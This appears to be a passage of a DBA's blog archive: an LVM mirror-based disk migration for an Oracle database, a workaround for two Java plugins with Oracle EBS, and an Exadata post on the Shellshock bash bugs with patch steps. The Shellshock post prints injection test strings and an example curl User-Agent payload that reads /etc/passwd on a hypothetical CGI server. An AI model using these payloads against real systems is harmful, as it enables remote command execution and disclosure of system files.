What we actually do is: add the new disk to the same VG, create a mirror of the logical volume on it, wait for the mirror to synchronize, and detach the old disk once they are in sync.
Thus, the newly mirrored disk becomes our new active disk, and our files end up migrated to the new disk.

Mirrored Logical Volume

Note that LVM keeps track of the regions that are in sync using a mirror log. This log can be stored on a separate disk, or it can be stored in memory. In the example below, we will store it in memory (the --corelog option).

lvconvert - convert a logical volume from linear to mirror or snapshot



-m, --mirrors Mirrors
Specifies the degree of the mirror you wish to create. For example, "-m 1" would convert the original logical volume to a mirror volume with 2 sides; that is, a linear volume plus one copy.


Here is an example ;

[root@localhost ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup-lv_root 18G 14G 3.0G 82% /
tmpfs 2.0G 560K 2.0G 1% /dev/shm
/dev/sda1 239M 54M 172M 24% /boot
/dev/mapper/vgu02-lvu02 12G 4.0G 7.2G 36% /u02  --> our disk that contains the datafiles



[root@localhost ~]# ps -ef |grep pmon
oracle 3979 1 0 10:11 ? 00:00:00 ora_pmon_ermantest -> Oracle instance is running

SQL> select name from v$datafile;
NAME
--------------------------------------------------------------------------------
/u02/erman/ermantest/system01.dbf
/u02/erman/ermantest/sysaux01.dbf
/u02/erman/ermantest/undotbs01.dbf
/u02/erman/ermantest/users01.dbf
/u02/erman/ermantest/example01.dbf

--> The database files are on the LVM


SQL> select name from v$controlfile;
NAME
--------------------------------------------------------------------------------
/u02/erman/ermantest/control01.ctl

--> The control file is on the LVM


fdisk -l
-----------------------------
Disk /dev/sdc: 12.9 GB, 12884901888 bytes --> this is our newly added disk, we will migrate our db to this disk.
128 heads, 33 sectors/track, 5957 cylinders
Units = cylinders of 4224 * 512 = 2162688 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x23bdf117

[root@localhost ~]# lvs

LV VG Attr LSize Pool Origin Data% Move Log Cpy%Sync Convert
lv_root VolGroup -wi-ao---- 17.51g
lv_swap VolGroup -wi-ao---- 2.00g
lvu02 vgu02 -wi-ao---- 12.00g  --> our source LVM

[root@localhost ~]# pvs
PV VG Fmt Attr PSize PFree
/dev/sda2 VolGroup lvm2 a-- 19.51g 0
/dev/sdb1 vgu02 lvm2 a-- 12.00g 0  --> our source physical volume


Here we start (we assume /dev/sdc has already been partitioned to create /dev/sdc1):

[root@localhost ~]# pvcreate /dev/sdc1
Physical volume "/dev/sdc1" successfully created

[root@localhost ~]# pvs
PV VG Fmt Attr PSize PFree
/dev/sda2 VolGroup lvm2 a-- 19.51g 0
/dev/sdb1 vgu02 lvm2 a-- 12.00g 0
/dev/sdc1 lvm2 a-- 12.00g 12.00g

[root@localhost ~]# vgextend vgu02 /dev/sdc1
Volume group "vgu02" successfully extended

[root@localhost ~]# vgs
VG #PV #LV #SN Attr VSize VFree
VolGroup 1 2 0 wz--n- 19.51g 0
vgu02 2 1 0 wz--n- 23.99g 12.00g

[root@localhost ~]# vgdisplay vgu02 -v
Using volume group(s) on command line
Finding volume group "vgu02"
--- Volume group ---
VG Name vgu02
System ID
Format lvm2
Metadata Areas 2
Metadata Sequence No 3
VG Access read/write
VG Status resizable
MAX LV 0
Cur LV 1
Open LV 1
Max PV 0
Cur PV 2
Act PV 2
VG Size 23.99 GiB
PE Size 4.00 MiB
Total PE 6142
Alloc PE / Size 3071 / 12.00 GiB
Free PE / Size 3071 / 12.00 GiB
VG UUID 4ajgbO-4yf1-aH7V-DMOv-Q2wf-IlYC-91mzce

--- Logical volume ---
LV Path /dev/vgu02/lvu02
LV Name lvu02
VG Name vgu02
LV UUID qjopJ8-PCHS-ESyJ-C227-zpMH-zkIp-D0jbrV
LV Write Access read/write
LV Creation host, time localhost.localdomain, 2014-10-13 11:09:00 +0300
LV Status available
# open 1
LV Size 12.00 GiB
Current LE 3071
Segments 1
Allocation inherit
Read ahead sectors auto
- currently set to 256
Block device 252:3

--- Physical volumes ---

PV Name /dev/sdb1
PV UUID t8kWWP-F9OE-AeWE-5QYa-RHGR-CaHT-K1tfUf
PV Status allocatable
Total PE / Free PE 3071 / 0
PV Name /dev/sdc1
PV UUID GMSidx-Yorp-NZN0-AYUP-aFF8-m6cf-t1LGj2
PV Status allocatable
Total PE / Free PE 3071 / 3071

[root@localhost ~]# lvconvert -m 1 /dev/vgu02/lvu02 /dev/sdc1 --corelog 

vgu02/lvu02: Converted: 0.4%
vgu02/lvu02: Converted: 2.7%
vgu02/lvu02: Converted: 5.0%
vgu02/lvu02: Converted: 7.1%
vgu02/lvu02: Converted: 9.2%
vgu02/lvu02: Converted: 11.1%
vgu02/lvu02: Converted: 13.3%
vgu02/lvu02: Converted: 15.3%
vgu02/lvu02: Converted: 18.5%
vgu02/lvu02: Converted: 20.8%
vgu02/lvu02: Converted: 23.0%
vgu02/lvu02: Converted: 25.2%
vgu02/lvu02: Converted: 27.4%
vgu02/lvu02: Converted: 29.8%
vgu02/lvu02: Converted: 32.1%
vgu02/lvu02: Converted: 36.2%
vgu02/lvu02: Converted: 38.6%
vgu02/lvu02: Converted: 62.4%
vgu02/lvu02: Converted: 100.0%

[root@localhost ~]# lvconvert -m 0 /dev/vgu02/lvu02 /dev/sdb1

Logical volume lvu02 converted.

[root@localhost ~]# lvs

LV VG Attr LSize Pool Origin Data% Move Log Cpy%Sync Convert
lv_root VolGroup -wi-ao---- 17.51g
lv_swap VolGroup -wi-ao---- 2.00g
lvu02 vgu02 -wi-ao---- 12.00g

[root@localhost ~]# vgreduce vgu02 /dev/sdb1
Removed "/dev/sdb1" from volume group "vgu02"

[root@localhost /]# pvremove /dev/sdb1
Labels on physical volume "/dev/sdb1" successfully wiped


That is it. The database is still running.
You may unplug the old disk from the server..

EBS 12.2 -- Multiple Java Plugins for different applications on the same Windows PC

In this post, I will explain the complicated process of making multiple Java plugins work on the same Windows PC used by EBS clients.

As you know, after you log in to EBS, OAF pages work through server-side Java. When it comes to Forms screens, an applet is triggered and client-side Java takes over.
Being a client-dependent environment means EBS clients have to be managed by client support teams. That is, client-side management becomes mandatory.
Plugin, add-on, and browser updates should be under control.
Normally, system administrators or client support teams are responsible for these kinds of management activities, but when a conflict or a problem occurs, this duty unfortunately falls to the Apps DBAs and makes their job even harder.

The job is hard because everything gets updated: browser vendors raise their security levels, Java becomes more security-hardened, code fixes or upgrades break interoperability, and so on.
Everything seems documented, but in real life even client-side management may become a headache.

I already have a blog post regarding EBS Common Client Problems & Solutions..
http://ermanarslan.blogspot.com.tr/2013/07/ebs-common-client-problems-solutions.html

In another post, I have explained the Security enhancements in Java and their effect to EBS clients..
http://ermanarslan.blogspot.com.tr/2014/04/ebs-and-java-7-security-missing.html

Today, I will explain running multiple Java plugins for Internet Explorer on EBS clients.
The process is complicated. Fortunately, I have real-life experience with it.

The requirement arises when you have multiple web applications that require different Java plugins.

In this example;
We had EBS 12.2, which could be accessed using Java plugin 1.6.0_45, and another web application which had to be accessed using Java plugin 1.7.0_51.
Every user had their own PC and had to be able to work both in EBS and in the other web application from that desktop PC.
That is, Internet Explorer on a single PC should be able to connect and work properly in EBS as well as in the other application, which requires Java 1.7.0_51.

The necessity of being able to connect to two different applications brought the requirement to have two Java plugins, 1) 1.6.0_45 and 2) 1.7.0_51, coexist on the client's Windows PC.

So far so good. We might install both of them, right?
But what about the decision that IE has to make?
I mean, IE should work properly when the client chooses to connect to EBS, and at the same time IE should work properly when the client chooses to connect to the other application, which requires Java plugin 1.7.0_51.
Note that the clients' browsers were IE 10 32-bit.

First of all, let's answer the following questions:
Does EBS 12.2 work properly with 1.7.0_51? YES
Are IE, EBS, and the Java plugin certified with each other? YES

So why were we afraid?
1.7.0_51 is a security-hardened Java release. With its new security enhancements, it will warn the client, or may create problems, if the code/JARs are unsigned.
As you may expect, this environment had unsigned JARs in EBS.
I mean, the JARs were unsigned and there were no near-future plans for signing them.

I thought the best approach would be to go through the possible scenarios and then build an action plan based on them.

Okay, let's see what we have on our agenda :)

1.7.0_51 installed but disabled, 1.6.0_45 installed & enabled:

Even though we had disabled Java plugin 1.7.0_51, when we opened the Forms we saw that 1.7.0_51 was still triggered.
It made the security checks and then passed control to 1.6.0_45.

So the security baseline mechanism seemed to work :)

JRE 7 Version           JRE 6 Security Baseline
1.7.0_67, 1.7.0_65      1.6.0_81
1.7.0_60, 1.7.0_55      1.6.0_75
1.7.0_51                1.6.0_71
1.7.0_45                1.6.0_65
1.7.0_40, 1.7.0_25      1.6.0_51
1.7.0_21                1.6.0_45
While making its security checks, it asked the question "Do you want to run this application?", which was expected, as it is caused by the security enhancements made in 1.7.0_51.
The answer could not be cached, and the question was repeated in every new browser session (after closing IE, or opening a new tab, the question was repeated).
Note that the question was related to code signing, as our customer did not have signed JARs.

Okay, after 1.6.0_45 opened the Forms screens, everything looked normal except one thing: when we logged out of Forms and tried to open a new Forms session without logging out of EBS, we encountered FRM-92050. On the other hand, the error was seen only on the first try; subsequent tries were successful.

When I analyzed the situation, I concluded that this was caused by an EBS bug. The bug was documented for IE 8, but it seemed applicable to IE 10, too:
"FRM-92050 When Re-Opening Forms using Internet Explorer 8 On 12.2.3 (Doc ID 1932415.1)"

So, the patch referenced in the document should fix the issue.

1.7.0_51 installed & enabled, 1.6.0_45 installed & enabled:
In this scenario, 1.7.0_51 was directly triggered, but this time the EBS Forms sessions were serviced by 1.7.0_51, not 1.6.0_45.
So the continuation of the story was the same as above.

The same security question appeared (again not cacheable, repeated in every new browser session, and again caused by the unsigned JARs), and the same FRM-92050 error occurred on the first re-open of a Forms session, with the same fix applying (Doc ID 1932415.1).

1.7.0_51 uninstalled, 1.6.0_45 installed:

No problems at all. No security questions about code signing, no Forms errors.
But what about the other application that requires 1.7.0_51? :) It will not be able to work properly.

1.7.0_51 installed and 1.6.0_45 installed; what if we switch Java plugins with a registry update?
It was a good idea to switch the Java plugin used by IE according to the application's needs. Playing with the Windows registry? Okay, I had the stomach for that kind of thing :) at least before this experience :)

I mean, if the user wants to log in to EBS, he or she can switch the Java plugin to 1.6.0_45 using a .reg file. Similarly, if the user wants to log in to the other application, he or she can switch the Java plugin to 1.7.0_51 using the relevant .reg file.

First of all, messing with the Windows registry is not a good thing; it is complicated and error-prone.
Especially when you have to change the configuration of tightly integrated programs like these.
When I worked on the registry, I saw that IE and the Java plugins are tightly integrated; it is not like flipping a switch and having everything work as you want. Java plugin related keys were everywhere in the registry, and it was hard to make a surgical change.

What I did was:

I first installed 1.6.0_45 and exported the registry from HKEY_LOCAL_MACHINE\Software.
Then I installed 1.7.0_51 and imported the .reg file that I had exported before that installation, and it worked! :)
I mean, with this action, IE started to use 1.6.0_45 even though 1.7.0_51 was installed on the system.
To switch back to 1.7.0_51, I did the same in the opposite direction. That is, I imported the .reg file containing the state of HKEY_LOCAL_MACHINE\Software as it was when Java plugin 1.7.0_51 was installed.

So, when I switched IE to work with 1.6.0_45, no problems were encountered at all: no security questions about code signing, no Forms errors.
Likewise, to make the other application work, I switched IE back to 1.7.0_51.

I must say that, with further analysis, a surgical change could be made; that is, only the necessary keys in the registry would be updated for such a switch operation.

Anyway, this approach was working, but it was messy, and probably unsupported by Microsoft.

Okay, we have seen the scenarios and different approaches above, so what is our conclusion then?

I think the Windows registry update should be considered a last resort.
The best approach is to apply the patch mentioned above and sign the JARs. The JARs should be signed with a code signing certificate obtained from a CA. If signing the JARs is not an option, then the clients should be willing to respond to the security prompts. Nevertheless, the prompt appears only when a new browser session (or, let's say, a new browser tab) is opened.

That's all for now. I hope you find it useful. Feel free to comment.

Thursday, October 2, 2014

EXADATA--Bash Vulnerabilities, CVE-2014-7169 CVE-2014-6271

These vulnerabilities affect Exadata X3 storage servers and database servers.
Before giving the action plan to correct the bash vulnerabilities on Exadata, let's have a closer look at them.

CVE-2014-6271:

The vulnerability is in Bash; it is also called Shellshock.

It arises when commands are placed after the closing brace of a shell function definition stored in an environment variable.
When a new bash is spawned, it interprets the environment variable as a function definition, but it also executes the commands that come after it.

To check this, the following commands may be used:

[root@osrvdb01 ~]# export erm='() { echo "function erm" ; }; echo "you are affected"; '
[root@osrvdb01 ~]# bash

If you are affected, the output will be:

you are affected

If you are safe, the output will be:

bash: warning: erm: ignoring function definition attempt
bash: error importing function definition for `erm'

In Exadata X3, we have GNU bash version 3.2.25 , and it is affected by this vulnerability.
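A variant of the same check that was widely circulated at the time, and that does not leave the crafted variable behind in your current shell (env passes it only to the child bash), is:

```shell
# Canonical CVE-2014-6271 check: the crafted "function" value is handed
# only to the child bash via env, so the current shell stays clean.
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
# A patched bash prints only "this is a test";
# a vulnerable bash prints "vulnerable" first.
```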

CVE-2014-7169:

The vulnerability is in Bash; it is also called Shellshock. It is in the parser: if you can trigger a suitable syntax error, you can execute commands via the next bash input line.
If you see your current system date in the output of the following commands, it means you are in danger:

env Exa='() { (a)=>\' sh -c "echo date"; cat echo

sh: Exa: line 1: syntax error near unexpected token `='
sh: Exa: line 1: `'
sh: error importing function definition for `Exa'
Wed Oct  1 15:09:38 EEST 2014

So, what happens with the command env Exa='() { (a)=>\' sh -c "echo date"; cat echo is this:

When bash is executed, it interprets the function definition and tries to declare it, but fails because of the syntax error; that is, the parser fails while parsing the definition.
Although the parser fails, it behaves like a buggy program:
"(a)=" makes the parser fail, but the parser leaves the ">" (redirection) character and the "\" (line continuation) character to be evaluated.
As a result, the next input line, "echo date", is effectively parsed as "> echo date", so the date command runs with its output redirected to a file named echo.
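On a patched shell the same command is harmless. A quick way to verify this (run in a scratch directory, since a vulnerable shell would create a file named echo there) is:

```shell
# Run the CVE-2014-7169 test string in a scratch directory.
# On a patched shell, "date" is printed literally and no file is created;
# on a vulnerable bash, the date output would land in a file named "echo".
cd "$(mktemp -d)"
env Exa='() { (a)=>\' bash -c "echo date" 2>/dev/null
[ -e echo ] || echo "no file named echo was created - shell looks patched"
```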

Okay, so far we have gotten to know the vulnerabilities.
Let's look at the risk;
the following table summarizes the risk matrix for these vulnerabilities.

Oracle Linux Risk Matrix

CVE#: CVE-2014-7169, CVE-2014-6271, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278
Component: Oracle Linux
Sub-component: Bash
Protocol: Multiple
Remote Exploit without Auth.?: Yes
CVSS 2.0 Base Score: 10.0
Access Vector: Network / Access Complexity: Low / Authentication: None
Confidentiality: Complete / Integrity: Complete / Availability: Complete
Supported Versions Affected: 4, 5, 6, 7

So, as you see above, these vulnerabilities are remotely exploitable without authentication.
The question that comes to mind is: how can this bug be exploited?

Based on my research, the most common attack surface seems to be CGI. That is, if your web server uses CGI, then you may be at risk of remote code execution.

A comprehensible POC was delivered by InvisibleThreat.

In the example given by InvisibleThreat, we see that,
by using curl and modifying the User-Agent header, remote code can be executed through a web server by taking advantage of the bash vulnerability CVE-2014-6271.
The vulnerability arises because the web server sets environment variables from the request headers and passes them to every CGI program.

The curl -A option is used to specify the User-Agent string sent to the web server.
We supply a malicious payload that exploits the bash vulnerability, and execute what we need to execute without any authentication.
That is, the web server (through CGI) sets this User-Agent in the environment, and while the environment is being set, our malicious function declaration comes into play and our code is executed.

By attacking in this way, an attacker can remotely execute code with the permissions of the OS user that runs the web server. So the attacker could, for example, delete the whole DocumentRoot and take down the website (HTTP 404).
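To see the mechanics without attacking a real server, we can simulate locally what a CGI-capable web server does: it copies request headers into environment variables and then spawns the handler. The curl line in the comment below is only a hypothetical illustration; the URL and script name do not exist.

```shell
# A real attack would be shaped like this (hypothetical target URL):
#   curl -A '() { :;}; /bin/cat /etc/passwd' http://victim.example.com/cgi-bin/status.sh
#
# Local simulation of the server side: the User-Agent header value lands
# in an environment variable before bash runs the CGI script.
HTTP_USER_AGENT='() { :;}; echo INJECTED' bash -c 'echo CGI script output'
# A patched bash prints only "CGI script output";
# a vulnerable bash would print "INJECTED" first.
```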

Well, we have learned about the vulnerabilities and seen a real-life example.
Let's take a look at what we can do to fix this on Exadata X3.

The vulnerability was reported by Oracle on September 26, 2014, with the title "Security Alert for bash vulnerabilities".
Both Exadata storage servers and database nodes are affected.
Actually, the MOS document "Responses to common Exadata security scan findings (Doc ID 1405320.1)" is what we are looking for.
The action plan for correcting the vulnerabilities on Exadata is as follows.
Note that this action plan can be used to correct both of the vulnerabilities: CVE-2014-7169 and CVE-2014-6271.
  • On database nodes, obtain and install the updated bash package, using the following version or later:
bash-3.2-33.el5_11.4.x86_64
To install this package on DB nodes, the exadata-sun-computenode-exact RPM must be removed first. If using Exadata DB server image version 11.2.3.3.0 or later, first run this command: rpm -e exadata-sun-computenode-exact
Then, use this command on all releases to install the updated rpm.
rpm -Uvh <new bash rpm>
  • To install this package on storage cells (supported as an exception for this CVE only), install using "rpm -Uvh --nodeps <path to bash rpm>"
For Solaris, you may obtain fixes via Note 1930090.1 to address this issue.

Note that ILOM and NM2-36p InfiniBand switch patches are planned but not yet available.